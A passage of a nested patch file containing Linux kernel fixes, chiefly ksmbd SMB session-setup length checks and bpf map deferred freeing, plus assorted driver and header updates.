+ 	unsigned int name_off, name_len, secbuf_len;
+ 
+-	secbuf_len = le16_to_cpu(req->SecurityBufferLength);
++	if (conn->use_spnego && conn->mechToken)
++		secbuf_len = conn->mechTokenLen;
++	else
++		secbuf_len = le16_to_cpu(req->SecurityBufferLength);
+ 	if (secbuf_len < sizeof(struct authenticate_message)) {
+ 		ksmbd_debug(SMB, "blob len %d too small\n", secbuf_len);
+ 		return NULL;
+@@ -1503,7 +1506,10 @@ static int ntlm_authenticate(struct ksmbd_work *work,
+ 		struct authenticate_message *authblob;
+ 
+ 		authblob = user_authblob(conn, req);
+-		sz = le16_to_cpu(req->SecurityBufferLength);
++		if (conn->use_spnego && conn->mechToken)
++			sz = conn->mechTokenLen;
++		else
++			sz = le16_to_cpu(req->SecurityBufferLength);
+ 		rc = ksmbd_decode_ntlmssp_auth_blob(authblob, sz, conn, sess);
+ 		if (rc) {
+ 			set_user_flag(sess->user, KSMBD_USER_FLAG_BAD_PASSWORD);
+@@ -1776,8 +1782,7 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 
+ 	negblob_off = le16_to_cpu(req->SecurityBufferOffset);
+ 	negblob_len = le16_to_cpu(req->SecurityBufferLength);
+-	if (negblob_off < offsetof(struct smb2_sess_setup_req, Buffer) ||
+-	    negblob_len < offsetof(struct negotiate_message, NegotiateFlags)) {
++	if (negblob_off < offsetof(struct smb2_sess_setup_req, Buffer)) {
+ 		rc = -EINVAL;
+ 		goto out_err;
+ 	}
+@@ -1786,8 +1791,15 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 			negblob_off);
+ 
+ 	if (decode_negotiation_token(conn, negblob, negblob_len) == 0) {
+-		if (conn->mechToken)
++		if (conn->mechToken) {
+ 			negblob = (struct negotiate_message *)conn->mechToken;
++			negblob_len = conn->mechTokenLen;
++		}
++	}
++
++	if (negblob_len < offsetof(struct negotiate_message, NegotiateFlags)) {
++		rc = -EINVAL;
++		goto out_err;
+ 	}
+ 
+ 	if (server_conf.auth_mechs & conn->auth_mechs) {
+diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
+index d160363c09ebc..e90a1e8c1951d 100644
+--- a/fs/smb/server/smb_common.c
++++ b/fs/smb/server/smb_common.c
+@@ -158,8 +158,12 @@ int ksmbd_verify_smb_message(struct ksmbd_work *work)
+  */
+ bool ksmbd_smb_request(struct ksmbd_conn *conn)
+ {
+-	__le32 *proto = (__le32 *)smb2_get_msg(conn->request_buf);
++	__le32 *proto;
+ 
++	if (conn->request_buf[0] != 0)
++		return false;
++
++	proto = (__le32 *)smb2_get_msg(conn->request_buf);
+ 	if (*proto == SMB2_COMPRESSION_TRANSFORM_ID) {
+ 		pr_err_ratelimited("smb2 compression not support yet");
+ 		return false;
+diff --git a/fs/smb/server/transport_rdma.c b/fs/smb/server/transport_rdma.c
+index c5629a68c8b73..8faa25c6e129b 100644
+--- a/fs/smb/server/transport_rdma.c
++++ b/fs/smb/server/transport_rdma.c
+@@ -2039,6 +2039,7 @@ static bool rdma_frwr_is_supported(struct ib_device_attr *attrs)
+ static int smb_direct_handle_connect_request(struct rdma_cm_id *new_cm_id)
+ {
+ 	struct smb_direct_transport *t;
++	struct task_struct *handler;
+ 	int ret;
+ 
+ 	if (!rdma_frwr_is_supported(&new_cm_id->device->attrs)) {
+@@ -2056,11 +2057,11 @@ static int smb_direct_handle_connect_request(struct rdma_cm_id *new_cm_id)
+ 	if (ret)
+ 		goto out_err;
+ 
+-	KSMBD_TRANS(t)->handler = kthread_run(ksmbd_conn_handler_loop,
+-					      KSMBD_TRANS(t)->conn, "ksmbd:r%u",
+-					      smb_direct_port);
+-	if (IS_ERR(KSMBD_TRANS(t)->handler)) {
+-		ret = PTR_ERR(KSMBD_TRANS(t)->handler);
++	handler = kthread_run(ksmbd_conn_handler_loop,
++			      KSMBD_TRANS(t)->conn, "ksmbd:r%u",
++			      smb_direct_port);
++	if (IS_ERR(handler)) {
++		ret = PTR_ERR(handler);
+ 		pr_err("Can't start thread\n");
+ 		goto out_err;
+ 	}
+diff --git a/fs/smb/server/transport_tcp.c b/fs/smb/server/transport_tcp.c
+index eff7a1d793f00..9d4222154dcc0 100644
+--- a/fs/smb/server/transport_tcp.c
++++ b/fs/smb/server/transport_tcp.c
+@@ -185,6 +185,7 @@ static int ksmbd_tcp_new_connection(struct socket *client_sk)
+ 	struct sockaddr *csin;
+ 	int rc = 0;
+ 	struct tcp_transport *t;
++	struct task_struct *handler;
+ 
+ 	t = alloc_transport(client_sk);
+ 	if (!t) {
+@@ -199,13 +200,13 @@ static int ksmbd_tcp_new_connection(struct socket *client_sk)
+ 		goto out_error;
+ 	}
+ 
+-	KSMBD_TRANS(t)->handler = kthread_run(ksmbd_conn_handler_loop,
+-					      KSMBD_TRANS(t)->conn,
+-					      "ksmbd:%u",
+-					      ksmbd_tcp_get_port(csin));
+-	if (IS_ERR(KSMBD_TRANS(t)->handler)) {
++	handler = kthread_run(ksmbd_conn_handler_loop,
++			      KSMBD_TRANS(t)->conn,
++			      "ksmbd:%u",
++			      ksmbd_tcp_get_port(csin));
++	if (IS_ERR(handler)) {
+ 		pr_err("cannot start conn thread\n");
+-		rc = PTR_ERR(KSMBD_TRANS(t)->handler);
++		rc = PTR_ERR(handler);
+ 		free_transport(t);
+ 	}
+ 	return rc;
+diff --git a/include/crypto/if_alg.h b/include/crypto/if_alg.h
+index a5db86670bdfa..a406e281ae571 100644
+--- a/include/crypto/if_alg.h
++++ b/include/crypto/if_alg.h
+@@ -138,6 +138,7 @@ struct af_alg_async_req {
+  *			recvmsg is invoked.
+  * @init:		True if metadata has been sent.
+  * @len:		Length of memory allocated for this data structure.
++ * @inflight:		Non-zero when AIO requests are in flight.
+  */
+ struct af_alg_ctx {
+ 	struct list_head tsgl_list;
+@@ -156,6 +157,8 @@ struct af_alg_ctx {
+ 	bool init;
+ 
+ 	unsigned int len;
++
++	unsigned int inflight;
+ };
+ 
+ int af_alg_register_type(const struct af_alg_type *type);
+diff --git a/include/drm/drm_bridge.h b/include/drm/drm_bridge.h
+index 6b656ea23b964..a76f4103d48bd 100644
+--- a/include/drm/drm_bridge.h
++++ b/include/drm/drm_bridge.h
+@@ -191,7 +191,7 @@ struct drm_bridge_funcs {
+ 	 * or &drm_encoder_helper_funcs.dpms hook.
+ 	 *
+ 	 * The bridge must assume that the display pipe (i.e. clocks and timing
+-	 * singals) feeding it is no longer running when this callback is
++	 * signals) feeding it is no longer running when this callback is
+ 	 * called.
+ 	 *
+ 	 * The @post_disable callback is optional.
+diff --git a/include/dt-bindings/clock/qcom,videocc-sm8150.h b/include/dt-bindings/clock/qcom,videocc-sm8150.h
+index e24ee840cfdb8..c557b78dc572f 100644
+--- a/include/dt-bindings/clock/qcom,videocc-sm8150.h
++++ b/include/dt-bindings/clock/qcom,videocc-sm8150.h
+@@ -16,6 +16,10 @@
+ 
+ /* VIDEO_CC Resets */
+ #define VIDEO_CC_MVSC_CORE_CLK_BCR	0
++#define VIDEO_CC_INTERFACE_BCR		1
++#define VIDEO_CC_MVS0_BCR		2
++#define VIDEO_CC_MVS1_BCR		3
++#define VIDEO_CC_MVSC_BCR		4
+ 
+ /* VIDEO_CC GDSCRs */
+ #define VENUS_GDSC			0
+diff --git a/include/linux/bio.h b/include/linux/bio.h
+index 2c5806997bbf7..2b9fc5edf49d6 100644
+--- a/include/linux/bio.h
++++ b/include/linux/bio.h
+@@ -279,6 +279,11 @@ static inline void bio_first_folio(struct folio_iter *fi, struct bio *bio,
+ {
+ 	struct bio_vec *bvec = bio_first_bvec_all(bio) + i;
+ 
++	if (unlikely(i >= bio->bi_vcnt)) {
++		fi->folio = NULL;
++		return;
++	}
++
+ 	fi->folio = page_folio(bvec->bv_page);
+ 	fi->offset = bvec->bv_offset +
+ 			PAGE_SIZE * (bvec->bv_page - &fi->folio->page);
+@@ -296,10 +301,8 @@ static inline void bio_next_folio(struct folio_iter *fi, struct bio *bio)
+ 		fi->offset = 0;
+ 		fi->length = min(folio_size(fi->folio), fi->_seg_count);
+ 		fi->_next = folio_next(fi->folio);
+-	} else if (fi->_i + 1 < bio->bi_vcnt) {
+-		bio_first_folio(fi, bio, fi->_i + 1);
+ 	} else {
+-		fi->folio = NULL;
++		bio_first_folio(fi, bio, fi->_i + 1);
+ 	}
+ }
+ 
+diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
+index 07a7eeef47d39..e255674a9ee72 100644
+--- a/include/linux/blkdev.h
++++ b/include/linux/blkdev.h
+@@ -1109,11 +1109,12 @@ static inline bool bdev_is_partition(struct block_device *bdev)
+ enum blk_default_limits {
+ 	BLK_MAX_SEGMENTS	= 128,
+ 	BLK_SAFE_MAX_SECTORS	= 255,
+-	BLK_DEF_MAX_SECTORS	= 2560,
+ 	BLK_MAX_SEGMENT_SIZE	= 65536,
+ 	BLK_SEG_BOUNDARY_MASK	= 0xFFFFFFFFUL,
+ };
+ 
++#define BLK_DEF_MAX_SECTORS 2560u
++
+ static inline unsigned long queue_segment_boundary(const struct request_queue *q)
+ {
+ 	return q->limits.seg_boundary_mask;
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index ba22cf4f5fc0e..c04a61ffac8ae 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -102,7 +102,11 @@ struct bpf_map_ops {
+ 	/* funcs called by prog_array and perf_event_array map */
+ 	void *(*map_fd_get_ptr)(struct bpf_map *map, struct file *map_file,
+ 				int fd);
+-	void (*map_fd_put_ptr)(void *ptr);
++	/* If need_defer is true, the implementation should guarantee that
++	 * the to-be-put element is still alive before the bpf program, which
++	 * may manipulate it, exists.
++	 */
++	void (*map_fd_put_ptr)(struct bpf_map *map, void *ptr, bool need_defer);
+ 	int (*map_gen_lookup)(struct bpf_map *map, struct bpf_insn *insn_buf);
+ 	u32 (*map_fd_sys_lookup_elem)(void *ptr);
+ 	void (*map_seq_show_elem)(struct bpf_map *map, void *key,
+@@ -233,7 +237,11 @@ struct bpf_map {
+ 	 */
+ 	atomic64_t refcnt ____cacheline_aligned;
+ 	atomic64_t usercnt;
+-	struct work_struct work;
++	/* rcu is used before freeing and work is only used during freeing */
++	union {
++		struct work_struct work;
++		struct rcu_head rcu;
++	};
+ 	struct mutex freeze_mutex;
+ 	atomic64_t writecnt;
+ 	/* 'Ownership' of program-containing map is claimed by the first program
+@@ -249,6 +257,8 @@ struct bpf_map {
+ 	} owner;
+ 	bool bypass_spec_v1;
+ 	bool frozen; /* write-once; write-protected by freeze_mutex */
++	bool free_after_mult_rcu_gp;
++	s64 __percpu *elem_count;
+ };
+ 
+ static inline bool map_value_has_spin_lock(const struct bpf_map *map)
+@@ -1791,6 +1801,35 @@ bpf_map_alloc_percpu(const struct bpf_map *map, size_t size, size_t align,
+ }
+ #endif
+ 
++static inline int
++bpf_map_init_elem_count(struct bpf_map *map)
++{
++	size_t size = sizeof(*map->elem_count), align = size;
++	gfp_t flags = GFP_USER | __GFP_NOWARN;
++
++	map->elem_count = bpf_map_alloc_percpu(map, size, align, flags);
++	if (!map->elem_count)
++		return -ENOMEM;
++
++	return 0;
++}
++
++static inline void
++bpf_map_free_elem_count(struct bpf_map *map)
++{
++	free_percpu(map->elem_count);
++}
++
++static inline void bpf_map_inc_elem_count(struct bpf_map *map)
++{
++	this_cpu_inc(*map->elem_count);
++}
++
++static inline void bpf_map_dec_elem_count(struct bpf_map *map)
++{
++	this_cpu_dec(*map->elem_count);
++}
++
+ extern int sysctl_unprivileged_bpf_disabled;
+ 
+ static inline bool bpf_allow_ptr_leaks(void)
+diff --git a/include/linux/clk-provider.h b/include/linux/clk-provider.h
+index 15e336281d1f4..94fcfefb52f3c 100644
+--- a/include/linux/clk-provider.h
++++ b/include/linux/clk-provider.h
+@@ -446,8 +446,8 @@ struct clk *clk_register_fixed_rate(struct device *dev, const char *name,
+  */
+ #define clk_hw_register_fixed_rate_with_accuracy_parent_hw(dev, name,	      \
+ 		parent_hw, flags, fixed_rate, fixed_accuracy)		      \
+-	__clk_hw_register_fixed_rate((dev), NULL, (name), NULL, (parent_hw)   \
+-				     NULL, NULL, (flags), (fixed_rate),	      \
++	__clk_hw_register_fixed_rate((dev), NULL, (name), NULL, (parent_hw),  \
++				     NULL, (flags), (fixed_rate),	      \
+ 				     (fixed_accuracy), 0, false)
+ /**
+  * clk_hw_register_fixed_rate_with_accuracy_parent_data - register fixed-rate
+diff --git a/include/linux/hisi_acc_qm.h b/include/linux/hisi_acc_qm.h
+index 41203ce27d64c..b566ae420449c 100644
+--- a/include/linux/hisi_acc_qm.h
++++ b/include/linux/hisi_acc_qm.h
+@@ -161,6 +161,11 @@ enum qm_cap_bits {
+ 	QM_SUPPORT_RPM,
+ };
+ 
++struct qm_dev_alg {
++	u64 alg_msk;
++	const char *alg;
++};
++
+ struct dfx_diff_registers {
+ 	u32 *regs;
+ 	u32 reg_offset;
+@@ -266,6 +271,16 @@ struct hisi_qm_cap_info {
+ 	u32 v3_val;
+ };
+ 
++struct hisi_qm_cap_record {
++	u32 type;
++	u32 cap_val;
++};
++
++struct hisi_qm_cap_tables {
++	struct hisi_qm_cap_record *qm_cap_table;
++	struct hisi_qm_cap_record *dev_cap_table;
++};
++
+ struct hisi_qm_list {
+ 	struct mutex lock;
+ 	struct list_head list;
+@@ -337,7 +352,6 @@ struct hisi_qm {
+ 	struct work_struct rst_work;
+ 	struct work_struct cmd_process;
+ 
+-	const char *algs;
+ 	bool use_sva;
+ 	bool is_frozen;
+ 
+@@ -348,6 +362,8 @@ struct hisi_qm {
+ 	struct qm_shaper_factor *factor;
+ 	u32 mb_qos;
+ 	u32 type_rate;
++
++	struct hisi_qm_cap_tables cap_tables;
+ };
+ 
+ struct hisi_qp_status {
+@@ -521,6 +537,8 @@ void hisi_qm_regs_dump(struct seq_file *s, struct debugfs_regset32 *regset);
+ u32 hisi_qm_get_hw_info(struct hisi_qm *qm,
+ 			const struct hisi_qm_cap_info *info_table,
+ 			u32 index, bool is_read);
++int hisi_qm_set_algs(struct hisi_qm *qm, u64 alg_msk, const struct qm_dev_alg *dev_algs,
++		     u32 dev_algs_size);
+ 
+ /* Used by VFIO ACC live migration driver */
+ struct pci_driver *hisi_sec_get_pf_driver(void);
+diff --git a/include/linux/iio/adc/adi-axi-adc.h b/include/linux/iio/adc/adi-axi-adc.h
+index 52620e5b80522..b7904992d5619 100644
+--- a/include/linux/iio/adc/adi-axi-adc.h
++++ b/include/linux/iio/adc/adi-axi-adc.h
+@@ -41,6 +41,7 @@ struct adi_axi_adc_chip_info {
+  * @reg_access		IIO debugfs_reg_access hook for the client ADC
+  * @read_raw		IIO read_raw hook for the client ADC
+  * @write_raw		IIO write_raw hook for the client ADC
++ * @read_avail		IIO read_avail hook for the client ADC
+  */
+ struct adi_axi_adc_conv {
+ 	const struct adi_axi_adc_chip_info		*chip_info;
+@@ -54,6 +55,9 @@ struct adi_axi_adc_conv {
+ 	int (*write_raw)(struct adi_axi_adc_conv *conv,
+ 			 struct iio_chan_spec const *chan,
+ 			 int val, int val2, long mask);
++	int (*read_avail)(struct adi_axi_adc_conv *conv,
++			  struct iio_chan_spec const *chan,
++			  const int **val, int *type, int *length, long mask);
+ };
+ 
+ struct adi_axi_adc_conv *devm_adi_axi_adc_conv_register(struct device *dev,
+diff --git a/include/linux/netfilter_bridge.h b/include/linux/netfilter_bridge.h
+index f980edfdd2783..743475ca7e9d5 100644
+--- a/include/linux/netfilter_bridge.h
++++ b/include/linux/netfilter_bridge.h
+@@ -42,7 +42,7 @@ static inline int nf_bridge_get_physinif(const struct sk_buff *skb)
+ 	if (!nf_bridge)
+ 		return 0;
+ 
+-	return nf_bridge->physindev ? nf_bridge->physindev->ifindex : 0;
++	return nf_bridge->physinif;
+ }
+ 
+ static inline int nf_bridge_get_physoutif(const struct sk_buff *skb)
+@@ -56,11 +56,11 @@ static inline int nf_bridge_get_physoutif(const struct sk_buff *skb)
+ }
+ 
+ static inline struct net_device *
+-nf_bridge_get_physindev(const struct sk_buff *skb)
++nf_bridge_get_physindev(const struct sk_buff *skb, struct net *net)
+ {
+ 	const struct nf_bridge_info *nf_bridge = nf_bridge_info_get(skb);
+ 
+-	return nf_bridge ? nf_bridge->physindev : NULL;
++	return nf_bridge ? dev_get_by_index_rcu(net, nf_bridge->physinif) : NULL;
+ }
+ 
+ static inline struct net_device *
+diff --git a/include/linux/of.h b/include/linux/of.h
+index 6b79ef9a6541f..1c5301e10442f 100644
+--- a/include/linux/of.h
++++ b/include/linux/of.h
+@@ -1155,7 +1155,8 @@ static inline int of_property_read_string_index(const struct device_node *np,
+  * @np:		device node from which the property value is to be read.
+  * @propname:	name of the property to be searched.
+  *
+- * Search for a property in a device node.
++ * Search for a boolean property in a device node. Usage on non-boolean
++ * property types is deprecated.
+  *
+  * Return: true if the property exists false otherwise.
+  */
+@@ -1167,6 +1168,20 @@ static inline bool of_property_read_bool(const struct device_node *np,
+ 	return prop ? true : false;
+ }
+ 
++/**
++ * of_property_present - Test if a property is present in a node
++ * @np:		device node to search for the property.
++ * @propname:	name of the property to be searched.
++ *
++ * Test for a property present in a device node.
++ *
++ * Return: true if the property exists false otherwise.
++ */
++static inline bool of_property_present(const struct device_node *np, const char *propname)
++{
++	return of_property_read_bool(np, propname);
++}
++
+ /**
+  * of_property_read_u8_array - Find and read an array of u8 from a property.
+  *
+diff --git a/include/linux/rcupdate.h b/include/linux/rcupdate.h
+index e9e61cd27ef63..46bd9a331fd5d 100644
+--- a/include/linux/rcupdate.h
++++ b/include/linux/rcupdate.h
+@@ -242,6 +242,18 @@ static inline void exit_tasks_rcu_stop(void) { }
+ static inline void exit_tasks_rcu_finish(void) { }
+ #endif /* #else #ifdef CONFIG_TASKS_RCU_GENERIC */
+ 
++/**
++ * rcu_trace_implies_rcu_gp - does an RCU Tasks Trace grace period imply an RCU grace period?
++ *
++ * As an accident of implementation, an RCU Tasks Trace grace period also
++ * acts as an RCU grace period.  However, this could change at any time.
++ * Code relying on this accident must call this function to verify that
++ * this accident is still happening.
++ *
++ * You have been warned!
++ */
++static inline bool rcu_trace_implies_rcu_gp(void) { return true; }
++
+ /**
+  * cond_resched_tasks_rcu_qs - Report potential quiescent states to RCU
+  *
+diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
+index 2feee144fc0ef..c30d419ebf545 100644
+--- a/include/linux/skbuff.h
++++ b/include/linux/skbuff.h
+@@ -301,7 +301,7 @@ struct nf_bridge_info {
+ 	u8			bridged_dnat:1;
+ 	u8			sabotage_in_done:1;
+ 	__u16			frag_max_size;
+-	struct net_device	*physindev;
++	int			physinif;
+ 
+ 	/* always valid & non-NULL from FORWARD on, for physdev match */
+ 	struct net_device	*physoutdev;
+diff --git a/include/net/bluetooth/hci_core.h b/include/net/bluetooth/hci_core.h
+index 5f8a534b65746..09c978f3d95dc 100644
+--- a/include/net/bluetooth/hci_core.h
++++ b/include/net/bluetooth/hci_core.h
+@@ -942,7 +942,6 @@ void hci_inquiry_cache_flush(struct hci_dev *hdev);
+ /* ----- HCI Connections ----- */
+ enum {
+ 	HCI_CONN_AUTH_PEND,
+-	HCI_CONN_REAUTH_PEND,
+ 	HCI_CONN_ENCRYPT_PEND,
+ 	HCI_CONN_RSWITCH_PEND,
+ 	HCI_CONN_MODE_CHANGE_PEND,
+diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h
+index 92dbe89dafbf5..201dc77ebbd77 100644
+--- a/include/uapi/linux/bpf.h
++++ b/include/uapi/linux/bpf.h
+@@ -4353,6 +4353,8 @@ union bpf_attr {
+  * long bpf_get_task_stack(struct task_struct *task, void *buf, u32 size, u64 flags)
+  *	Description
+  *		Return a user or a kernel stack in bpf program provided buffer.
++ *		Note: the user stack will only be populated if the *task* is
++ *		the current task; all other tasks will return -EOPNOTSUPP.
+  *		To achieve this, the helper needs *task*, which is a valid
+  *		pointer to **struct task_struct**. To store the stacktrace, the
+  *		bpf program provides *buf* with a nonnegative *size*.
+@@ -4364,6 +4366,7 @@ union bpf_attr {
+  *
+  *		**BPF_F_USER_STACK**
+  *			Collect a user space stack instead of a kernel stack.
++ *			The *task* must be the current task.
+  *		**BPF_F_USER_BUILD_ID**
+  *			Collect buildid+offset instead of ips for user stack,
+  *			only valid if **BPF_F_USER_STACK** is also specified.
+diff --git a/init/do_mounts.c b/init/do_mounts.c
+index 811e94daf0a84..2d705b9c84007 100644
+--- a/init/do_mounts.c
++++ b/init/do_mounts.c
+@@ -665,7 +665,10 @@ struct file_system_type rootfs_fs_type = {
+ 
+ void __init init_rootfs(void)
+ {
+-	if (IS_ENABLED(CONFIG_TMPFS) && !saved_root_name[0] &&
+-		(!root_fs_names || strstr(root_fs_names, "tmpfs")))
+-		is_tmpfs = true;
++	if (IS_ENABLED(CONFIG_TMPFS)) {
++		if (!saved_root_name[0] && !root_fs_names)
++			is_tmpfs = true;
++		else if (root_fs_names && !!strstr(root_fs_names, "tmpfs"))
++			is_tmpfs = true;
++	}
+ }
+diff --git a/io_uring/rw.c b/io_uring/rw.c
+index 0133db648d8e9..038e6b13a7496 100644
+--- a/io_uring/rw.c
++++ b/io_uring/rw.c
+@@ -534,15 +534,19 @@ static inline int io_rw_prep_async(struct io_kiocb *req, int rw)
+ 	struct iovec *iov;
+ 	int ret;
+ 
++	iorw->bytes_done = 0;
++	iorw->free_iovec = NULL;
++
+ 	/* submission path, ->uring_lock should already be taken */
+ 	ret = io_import_iovec(rw, req, &iov, &iorw->s, 0);
+ 	if (unlikely(ret < 0))
+ 		return ret;
+ 
+-	iorw->bytes_done = 0;
+-	iorw->free_iovec = iov;
+-	if (iov)
++	if (iov) {
++		iorw->free_iovec = iov;
+ 		req->flags |= REQ_F_NEED_CLEANUP;
++	}
++
+ 	return 0;
+ }
+ 
+diff --git a/kernel/bpf/arraymap.c b/kernel/bpf/arraymap.c
+index 00f23febb9a7d..c04e69f34e4d5 100644
+--- a/kernel/bpf/arraymap.c
++++ b/kernel/bpf/arraymap.c
+@@ -852,7 +852,7 @@ int bpf_fd_array_map_update_elem(struct bpf_map *map, struct file *map_file,
+ 	}
+ 
+ 	if (old_ptr)
+-		map->ops->map_fd_put_ptr(old_ptr);
++		map->ops->map_fd_put_ptr(map, old_ptr, true);
+ 	return 0;
+ }
+ 
+@@ -875,7 +875,7 @@ static int fd_array_map_delete_elem(struct bpf_map *map, void *key)
+ 	}
+ 
+ 	if (old_ptr) {
+-		map->ops->map_fd_put_ptr(old_ptr);
++		map->ops->map_fd_put_ptr(map, old_ptr, true);
+ 		return 0;
+ 	} else {
+ 		return -ENOENT;
+@@ -898,8 +898,9 @@ static void *prog_fd_array_get_ptr(struct bpf_map *map,
+ 	return prog;
+ }
+ 
+-static void prog_fd_array_put_ptr(void *ptr)
++static void prog_fd_array_put_ptr(struct bpf_map *map, void *ptr, bool need_defer)
+ {
++	/* bpf_prog is freed after one RCU or tasks trace grace period */
+ 	bpf_prog_put(ptr);
+ }
+ 
+@@ -1185,8 +1186,9 @@ err_out:
+ 	return ee;
+ }
+ 
+-static void perf_event_fd_array_put_ptr(void *ptr)
++static void perf_event_fd_array_put_ptr(struct bpf_map *map, void *ptr, bool need_defer)
+ {
++	/* bpf_perf_event is freed after one RCU grace period */
+ 	bpf_event_entry_free_rcu(ptr);
+ }
+ 
+@@ -1239,7 +1241,7 @@ static void *cgroup_fd_array_get_ptr(struct bpf_map *map,
+ 	return cgroup_get_from_fd(fd);
+ }
+ 
+-static void cgroup_fd_array_put_ptr(void *ptr)
++static void cgroup_fd_array_put_ptr(struct bpf_map *map, void *ptr, bool need_defer)
+ {
+ 	/* cgroup_put free cgrp after a rcu grace period */
+ 	cgroup_put(ptr);
+diff --git a/kernel/bpf/hashtab.c b/kernel/bpf/hashtab.c
+index ce0051eee746e..88c71de0a0a95 100644
+--- a/kernel/bpf/hashtab.c
++++ b/kernel/bpf/hashtab.c
+@@ -880,7 +880,7 @@ static void htab_put_fd_value(struct bpf_htab *htab, struct htab_elem *l)
+ 
+ 	if (map->ops->map_fd_put_ptr) {
+ 		ptr = fd_htab_map_get_ptr(map, l);
+-		map->ops->map_fd_put_ptr(ptr);
++		map->ops->map_fd_put_ptr(map, ptr, true);
+ 	}
+ }
+ 
+@@ -2424,7 +2424,7 @@ static void fd_htab_map_free(struct bpf_map *map)
+ 		hlist_nulls_for_each_entry_safe(l, n, head, hash_node) {
+ 			void *ptr = fd_htab_map_get_ptr(map, l);
+ 
+-			map->ops->map_fd_put_ptr(ptr);
++			map->ops->map_fd_put_ptr(map, ptr, false);
+ 		}
+ 	}
+ 
+@@ -2465,7 +2465,7 @@ int bpf_fd_htab_map_update_elem(struct bpf_map *map, struct file *map_file,
+ 
+ 	ret = htab_map_update_elem(map, key, &ptr, map_flags);
+ 	if (ret)
+-		map->ops->map_fd_put_ptr(ptr);
++		map->ops->map_fd_put_ptr(map, ptr, false);
+ 
+ 	return ret;
+ }
+diff --git a/kernel/bpf/lpm_trie.c b/kernel/bpf/lpm_trie.c
+index d833496e9e426..ce3a091d52e89 100644
+--- a/kernel/bpf/lpm_trie.c
++++ b/kernel/bpf/lpm_trie.c
+@@ -231,6 +231,9 @@ static void *trie_lookup_elem(struct bpf_map *map, void *_key)
+ 	struct lpm_trie_node *node, *found = NULL;
+ 	struct bpf_lpm_trie_key *key = _key;
+ 
++	if (key->prefixlen > trie->max_prefixlen)
++		return NULL;
++
+ 	/* Start walking the trie from the root node ... */
+ 
+ 	for (node = rcu_dereference_check(trie->root, rcu_read_lock_bh_held());
+diff --git a/kernel/bpf/map_in_map.c b/kernel/bpf/map_in_map.c
+index 8e87f69aae60d..141f3332038c7 100644
+--- a/kernel/bpf/map_in_map.c
++++ b/kernel/bpf/map_in_map.c
+@@ -115,12 +115,17 @@ void *bpf_map_fd_get_ptr(struct bpf_map *map,
+ 	return inner_map;
+ }
+ 
+-void bpf_map_fd_put_ptr(void *ptr)
++void bpf_map_fd_put_ptr(struct bpf_map *map, void *ptr, bool need_defer)
+ {
+-	/* ptr->ops->map_free() has to go through one
+-	 * rcu grace period by itself.
++	struct bpf_map *inner_map = ptr;
++
++	/* The inner map may still be used by both non-sleepable and sleepable
++	 * bpf program, so free it after one RCU grace period and one tasks
++	 * trace RCU grace period.
+ 	 */
+-	bpf_map_put(ptr);
++	if (need_defer)
++		WRITE_ONCE(inner_map->free_after_mult_rcu_gp, true);
++	bpf_map_put(inner_map);
+ }
+ 
+ u32 bpf_map_fd_sys_lookup_elem(void *ptr)
+diff --git a/kernel/bpf/map_in_map.h b/kernel/bpf/map_in_map.h
+index bcb7534afb3c0..7d61602354de8 100644
+--- a/kernel/bpf/map_in_map.h
++++ b/kernel/bpf/map_in_map.h
+@@ -13,7 +13,7 @@ struct bpf_map *bpf_map_meta_alloc(int inner_map_ufd);
+ void bpf_map_meta_free(struct bpf_map *map_meta);
+ void *bpf_map_fd_get_ptr(struct bpf_map *map, struct file *map_file,
+ 			 int ufd);
+-void bpf_map_fd_put_ptr(void *ptr);
++void bpf_map_fd_put_ptr(struct bpf_map *map, void *ptr, bool need_defer);
+ u32 bpf_map_fd_sys_lookup_elem(void *ptr);
+ 
+ #endif
+diff --git a/kernel/bpf/stackmap.c b/kernel/bpf/stackmap.c
+index aecea7451b610..f86db3cf72123 100644
+--- a/kernel/bpf/stackmap.c
++++ b/kernel/bpf/stackmap.c
+@@ -391,6 +391,7 @@ static long __bpf_get_stack(struct pt_regs *regs, struct task_struct *task,
+ {
+ 	u32 trace_nr, copy_len, elem_size, num_elem, max_depth;
+ 	bool user_build_id = flags & BPF_F_USER_BUILD_ID;
++	bool crosstask = task && task != current;
+ 	u32 skip = flags & BPF_F_SKIP_FIELD_MASK;
+ 	bool user = flags & BPF_F_USER_STACK;
+ 	struct perf_callchain_entry *trace;
+@@ -413,6 +414,14 @@ static long __bpf_get_stack(struct pt_regs *regs, struct task_struct *task,
+ 	if (task && user && !user_mode(regs))
+ 		goto err_fault;
+ 
++	/* get_perf_callchain does not support crosstask user stack walking
++	 * but returns an empty stack instead of NULL.
++	 */
++	if (crosstask && user) {
++		err = -EOPNOTSUPP;
++		goto clear;
++	}
++
+ 	num_elem = size / elem_size;
+ 	max_depth = num_elem + skip;
+ 	if (sysctl_perf_event_max_stack < max_depth)
+@@ -424,7 +433,7 @@ static long __bpf_get_stack(struct pt_regs *regs, struct task_struct *task,
+ 		trace = get_callchain_entry_for_task(task, max_depth);
+ 	else
+ 		trace = get_perf_callchain(regs, 0, kernel, user, max_depth,
+-					   false, false);
++					   crosstask, false);
+ 	if (unlikely(!trace))
+ 		goto err_fault;
+ 
+diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
+index 0c8b7733573ee..8d0c38a8dcf2d 100644
+--- a/kernel/bpf/syscall.c
++++ b/kernel/bpf/syscall.c
+@@ -628,6 +628,28 @@ static void bpf_map_put_uref(struct bpf_map *map)
+ 	}
+ }
+ 
++static void bpf_map_free_in_work(struct bpf_map *map)
++{
++	INIT_WORK(&map->work, bpf_map_free_deferred);
++	/* Avoid spawning kworkers, since they all might contend
++	 * for the same mutex like slab_mutex.
++	 */
++	queue_work(system_unbound_wq, &map->work);
++}
++
++static void bpf_map_free_rcu_gp(struct rcu_head *rcu)
++{
++	bpf_map_free_in_work(container_of(rcu, struct bpf_map, rcu));
++}
++
++static void bpf_map_free_mult_rcu_gp(struct rcu_head *rcu)
++{
++	if (rcu_trace_implies_rcu_gp())
++		bpf_map_free_rcu_gp(rcu);
++	else
++		call_rcu(rcu, bpf_map_free_rcu_gp);
++}
++
+ /* decrement map refcnt and schedule it for freeing via workqueue
+  * (unrelying map implementation ops->map_free() might sleep)
+  */
